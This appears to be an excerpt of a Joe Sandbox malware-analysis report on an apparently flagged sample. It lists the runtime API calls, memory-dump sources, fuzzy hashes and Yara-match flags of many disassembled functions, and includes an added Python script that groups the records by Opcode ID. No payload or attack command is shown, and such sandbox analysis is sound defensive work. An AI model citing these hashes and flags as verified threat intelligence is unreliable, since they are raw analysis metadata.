• Instruction Fuzzy Hash: 69F0E2B1A002253AE724B6765D07FFB369C9B00B54F50091BB905E60C2EDDCE58042AC
APIs
• Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 024AD088
• Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 024AD0AC
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 024AD0BF
• __CxxThrowException@8.LIBVCRUNTIME ref: 024AD0CD
Memory Dump Source
• Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
Yara matches
Similarity
• API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
• String ID:
• API String ID: 3657713681-0
• Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
• Instruction ID: b0a4eca62322b1d84707fac2300e90fa9110b837576241020249691defa0fa32
• Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
• Instruction Fuzzy Hash: FFF05935E04204E7C724FB16D862C9EB77A8EB0B18360852FD80517685DB31A90ACEA1
APIs
• std::_Cnd_initX.LIBCPMT ref: 02495A83
• __Cnd_signal.LIBCPMT ref: 02495A8F
• std::_Cnd_initX.LIBCPMT ref: 02495AA4
• __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 02495AAB
Memory Dump Source
• Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
Yara matches
Similarity
• API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
• String ID:
• API String ID: 2059591211-0
• Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
• Instruction ID: 1d291883ecb988132d4ad8f1209f9f805ce79026a3dbe43b70d27fdf92383c51
• Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
• Instruction Fuzzy Hash: 75F0A031400701AFEF31BB73D80671A7BA2AF00328F14481FE05A969A0CFBAE8588E55
APIs
• RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 024A286F
• GetLastError.KERNEL32(?,?,?,?,024A8830,?,?,?,?,00000000,?,00000000), ref: 024A287E
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024A2894
• __CxxThrowException@8.LIBVCRUNTIME ref: 024A28A2
Memory Dump Source
• Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
Yara matches
Similarity
• API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
• String ID:
• API String ID: 3803302727-0
• Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
• Instruction ID: 5b178edeeb9e694e79348fd3ea74aa3d72978b0baca00257bc04dd5c53f34f05
• Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
• Instruction Fuzzy Hash: 43F0A07450010ABBCF00EFE5CD44EAF37B86B00701F20061AB914E20A0DB74D604AB64
APIs
• RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 00412608
• GetLastError.KERNEL32(?,?,?,?,004185C9,?,?,?,?,00000000,?,00000000), ref: 00412617
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041262D
• __CxxThrowException@8.LIBVCRUNTIME ref: 0041263B
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
• String ID:
• API String ID: 3803302727-0
• Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
• Instruction ID: 24969db738fe4d1a967b5a52fd3328d3273a2fbbb48021401f3901a8ee12547a
• Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
• Instruction Fuzzy Hash: 7FF0A03460010AFBCF00EFA5DE46EEF37687B00745F600616B610E20E1EB79DA549768
APIs
• ___crtCreateEventExW.LIBCPMT ref: 024A2593
• GetLastError.KERNEL32(?,?,?,?,?,024A0DA0), ref: 024A25A1
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024A25B7
• __CxxThrowException@8.LIBVCRUNTIME ref: 024A25C5
Memory Dump Source
• Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
Yara matches
Similarity
• API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
• String ID:
• API String ID: 200240550-0
• Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
• Instruction ID: 3a96b71ea9408bb28c296cf4102a922ad59a4c9c7cf212227c5e00dea17457b8
• Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
• Instruction Fuzzy Hash: 91E0D861A002153AEB10F7768C26F7F369C9B20B41F84085BBD14E11C1FAD4D10059B4
APIs
• ___crtCreateEventExW.LIBCPMT ref: 0041232C
• GetLastError.KERNEL32(?,?,?,?,?,00410B39), ref: 0041233A
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412350
• __CxxThrowException@8.LIBVCRUNTIME ref: 0041235E
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 200240550-0
                                                                                                                                                                                                                                            • Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                                                                                                                                                                                                            • Instruction ID: 785b6ff49928477fe7b23022ebabbc79c69e7cefd8d4159d1ac4e3541b52c9d2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 01E0D871A0021929E710B7768E03FBF369C6B00B49F54096ABE14E51D3FDACD65042AC
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 024A2959: TlsAlloc.KERNEL32(?,024A0DA0), ref: 024A295F
                                                                                                                                                                                                                                            • TlsAlloc.KERNEL32(?,024A0DA0), ref: 024B3BE6
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 024B3BF8
                                                                                                                                                                                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024B3C0E
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 024B3C1C
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3735082963-0
                                                                                                                                                                                                                                            • Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                                                                                                                                                                                                            • Instruction ID: b3c97a95c1233cc29df054eb62f286d4cf722dc31770e959dbb7d71aa340c71b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EFE061745042016FC700FF775C556BF3A686E007017100E7BE529D2191EB34D0454F7C
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 004126F2: TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8
                                                                                                                                                                                                                                            • TlsAlloc.KERNEL32(?,00410B39), ref: 0042397F
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00423991
                                                                                                                                                                                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004239A7
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004239B5
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3735082963-0
                                                                                                                                                                                                                                            • Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                                                                                                                                                                                                            • Instruction ID: d941d7adcdfcb95fe7f1ae92eeb0e95f25cd9e5dbb2d3936931fab3d4402dca1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FEE02BB09002206EC300BF766C4A66E3274750130AB500B2BB151D21D2EEBCD1844A9D
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,024A0DA0), ref: 024A279E
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,024A0DA0), ref: 024A27AD
                                                                                                                                                                                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024A27C3
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 024A27D1
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3016159387-0
                                                                                                                                                                                                                                            • Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                                                                                                                                                                                                            • Instruction ID: 86d11cf1b1ea1a6c194e31be25a5354771eedb02b7757a04601ed483c977df47
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ADE0867C60010AA7CB00FBB6DD49EAF73BC6E10B05B600566A905E3150EBA8D7089B79
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B39), ref: 00412537
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B39), ref: 00412546
                                                                                                                                                                                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041255C
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0041256A
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3016159387-0
                                                                                                                                                                                                                                            • Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                                                                                                                                                                                                            • Instruction ID: 7399f334bae95f1f5dd7aa6ec606231f62b338b040d4ba0de61eab0e9ab47a66
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A1E0D87060010AABC700EBB5DE4AAEF73BC7A00605B600166A101E2151EA6CDA44877C
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetThreadPriority.KERNEL32(?,?), ref: 024A28F8
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 024A2904
                                                                                                                                                                                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024A291A
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 024A2928
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4286982218-0
                                                                                                                                                                                                                                            • Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                                                                                                                                                                                                            • Instruction ID: df36c4138965ba6795728a2015c1251380815ce3c20f7dd82acac46429a2ea21
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9FE0863460010967DB14FF72CC05BBB376C7F10B45B500926BD19D20A0EB75D1049AA8
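The records above are the per-function listing the report produces for each disassembled function: the APIs it calls, the memory dump it was lifted from, and the Similarity hashes. Several functions appear twice with the same Opcode ID but a different Instruction ID: once in the image mapped at 00400000 (based on PE: true) and once in the region at 02490000 (based on PE: false, Yara matches). The script below is an added example and is not part of the Joe Sandbox report or its tooling; it parses records in the layout shown on this page (its input is a constructed excerpt, the TlsAlloc pair above) and lists every Opcode ID present in more than one dump, which is a quick way to see which functions the Yara-flagged region shares with the main module. The record layout and field names are assumptions read off this page, not Joe Sandbox's documented format.

```python
"""Group a Joe Sandbox report's per-function records by Opcode ID (added example)."""
import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed input: the TlsAlloc record pair from this page, leading whitespace removed.
SAMPLE_REPORT = """\
APIs
  • Part of subcall function 024A2959: TlsAlloc.KERNEL32(?,024A0DA0), ref: 024A295F
• TlsAlloc.KERNEL32(?,024A0DA0), ref: 024B3BE6
• GetLastError.KERNEL32 ref: 024B3BF8
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024B3C0E
• __CxxThrowException@8.LIBVCRUNTIME ref: 024B3C1C
Memory Dump Source
• Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
Yara matches
Similarity
• API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
• String ID:
• API String ID: 3735082963-0
• Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
• Instruction ID: b3c97a95c1233cc29df054eb62f286d4cf722dc31770e959dbb7d71aa340c71b
• Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
• Instruction Fuzzy Hash: EFE061745042016FC700FF775C556BF3A686E007017100E7BE529D2191EB34D0454F7C
APIs
  • Part of subcall function 004126F2: TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8
• TlsAlloc.KERNEL32(?,00410B39), ref: 0042397F
• GetLastError.KERNEL32 ref: 00423991
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004239A7
• __CxxThrowException@8.LIBVCRUNTIME ref: 004239B5
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
• String ID:
• API String ID: 3735082963-0
• Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
• Instruction ID: d941d7adcdfcb95fe7f1ae92eeb0e95f25cd9e5dbb2d3936931fab3d4402dca1
• Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
• Instruction Fuzzy Hash: FEE02BB09002206EC300BF766C4A66E3274750130AB500B2BB151D21D2EEBCD1844A9D
"""

SUBCALL = "Part of subcall function "
# NAME.LIBRARY, optional argument list, then "ref: ADDR"; the comma before "ref" varies.
API_LINE = re.compile(
    r"^(?P<name>\S+?)\.(?P<lib>[A-Z0-9]+)(?:\(.*?\))?,?\s+ref: (?P<addr>[0-9A-F]+)$")
SOURCE_LINE = re.compile(r"Offset: (?P<off>[0-9A-F]+), based on PE: (?P<pe>true|false)$")

@dataclass
class FunctionRecord:
    apis: list                # direct API calls, in the order the report lists them
    offset: int               # base address of the dump the function was lifted from
    based_on_pe: bool         # True when the dump is a mapped PE image
    yara_match: bool          # True when the record carries a "Yara matches" entry
    opcode_id: str = ""       # identical for the page's two copies of a function
    instruction_id: str = ""  # differs between the two copies (different addresses)

def parse_records(text: str) -> list:
    """Split report text into FunctionRecords, one per 'APIs' heading."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = FunctionRecord([], 0, False, False)
            records.append(current)
        elif current is None:
            continue
        elif line == "Yara matches":
            current.yara_match = True
        else:
            field = line.lstrip("•").strip()
            if field.startswith(SUBCALL):
                continue  # a call made by a callee, not by this function itself
            if m := API_LINE.match(field):
                current.apis.append(m.group("name"))
            elif m := SOURCE_LINE.search(field):
                current.offset = int(m.group("off"), 16)
                current.based_on_pe = m.group("pe") == "true"
            elif field.startswith(("Opcode ID: ", "Instruction ID: ")):
                key, value = field.split(": ", 1)
                setattr(current, key.lower().replace(" ", "_"), value)
    return records

def shared_across_dumps(records: list) -> dict:
    """Map each Opcode ID seen in more than one dump to its sorted dump base offsets."""
    by_opcode = defaultdict(set)
    for r in records:
        if r.opcode_id:
            by_opcode[r.opcode_id].add(r.offset)
    return {k: sorted(v) for k, v in by_opcode.items() if len(v) > 1}

if __name__ == "__main__":
    for opcode, offsets in shared_across_dumps(parse_records(SAMPLE_REPORT)).items():
        print(opcode[:16], "present in dumps at", [hex(o) for o in offsets])
```

To run it on a full report saved as text, replace SAMPLE_REPORT with the file contents; Opcode IDs that occur in only one dump are left out of the result, and the "Part of subcall function" bullets are skipped so that `apis` lists only the calls the function makes itself.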
APIs
• TlsSetValue.KERNEL32(?,00000000,024A7BD8,00000000,?,?,024A0DA0,?,?,?,00000000,?,00000000), ref: 024A29BE
• GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 024A29CA
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024A29E0
• __CxxThrowException@8.LIBVCRUNTIME ref: 024A29EE
Memory Dump Source
• Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1964976909-0
                                                                                                                                                                                                                                            • Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                                                                                                                                                                                                            • Instruction ID: ea74fe14828d9e44e23c0c8f59f6b3d5d4302b0e7e13ed2f12297a5d37604dbd
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 50E086742001096BDB10FF71CC08BBF376C7F10B45B500926BD19D10A0EB75D114AAA8
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetThreadPriority.KERNEL32(?,?), ref: 00412691
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0041269D
                                                                                                                                                                                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004126B3
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004126C1
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4286982218-0
                                                                                                                                                                                                                                            • Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                                                                                                                                                                                                            • Instruction ID: eb1a6d40bee4d863ba02ef3eb8c9f1a5d1f26ddbf15ae4e912fb13e181a4c061
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3CE04F34600119ABCB14BF619E06BAF376C7A00745B50052AB515D10A2EE79D564869C
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • TlsSetValue.KERNEL32(?,00000000,00417971,00000000,?,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412757
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00412763
                                                                                                                                                                                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412779
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00412787
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1964976909-0
                                                                                                                                                                                                                                            • Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                                                                                                                                                                                                            • Instruction ID: 63a90eab5ccd82633b541feab557f5b3d99097aee930e3f4eaa44923ec20be65
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 43E04F34600119AADB10BF619E0AAAF37A87A00A45B50052AB915D10A2EE79D564869C
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • TlsAlloc.KERNEL32(?,024A0DA0), ref: 024A295F
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 024A296C
                                                                                                                                                                                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024A2982
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 024A2990
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3103352999-0
                                                                                                                                                                                                                                            • Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                                                                                                                                                                                                            • Instruction ID: b69a824207fba3da389de3e87c5744bc4b3fc70d9c3239280e3e36a703973d80
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 37E02B7410010567C714FBB99C4CBBF32AC7F11B15B600F2BF865E20E0EBA8D1085AAC
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00412705
                                                                                                                                                                                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041271B
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00412729
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3103352999-0
                                                                                                                                                                                                                                            • Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
